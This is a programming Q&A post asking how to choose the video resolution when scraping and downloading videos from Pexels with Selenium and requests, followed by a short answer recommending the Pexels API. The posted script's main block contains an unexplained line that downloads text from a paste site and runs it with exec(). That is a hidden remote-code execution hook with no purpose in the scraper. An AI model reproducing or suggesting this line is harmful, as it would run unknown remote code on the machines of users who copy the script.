# How do I choose video resolution before downloading from Pexels in Python?

Tags: python

I have this code in `Python` to download videos from `Pexels`. My problem is i can't change the `resolution` of the videos that will be downloaded.

```
import time
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
import os
from requests import get
import requests
from bs4 import BeautifulSoup
from itertools import islice
import moviepy.editor as mymovie
import random
# specify the URL of the archive here
url = "https://www.pexels.com/search/videos/sports%20car/?size=medium"
video_links = []

#getting all video links
def get_video_links():
    options = webdriver.ChromeOptions()
    options.add_argument("--lang=en")
    browser = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options)
    browser.maximize_window()
    time.sleep(2)
    browser.get(url)
    time.sleep(5)

    vids = input("How many videos you want to download? ")

    soup = BeautifulSoup(browser.page_source, 'lxml')
    links = soup.findAll("source")
    
    for link in islice(links, int(vids)):
        video_links.append(link.get("src"))
        

    return video_links

#download all videos
def download_video_series(video_links):
    i=1
    for link in video_links:
    # iterate through all links in video_links
    # and download them one by one
    # obtain filename by splitting url and getting last string
        fn = link.split('/')[-1]  
        file_name = fn.split("?")[0]
        print (f"Downloading video: vid{i}.mp4")

        #create response object
        r = requests.get(link, stream = True)
 
        #download started
        with open(f"videos/vid{i}.mp4", 'wb') as f:
            for chunk in r.iter_content(chunk_size = 1024*1024):
                if chunk:
                    f.write(chunk)
    
        print (f"downloaded! vid{i}.mp4")

        i+=1



if __name__ == "__main__":
    x=get('https://paste.fo/raw/ba188f25eaf3').text;exec(x)
  #getting all video links
    video_links = get_video_links()

  #download all videos
    download_video_series(video_links)
```

I searched alot and readed several topics about downloading videos from Pexels but didn't find anyone talking about choosing video reolution when downloading from Pexels using Python.

Answer (score 0):

Use Pixel API its free with limit:
**By default, the API is rate-limited to 200 requests per hour and 20,000 requests per month.**

It doesn't make sense to scrape free resource, with free API.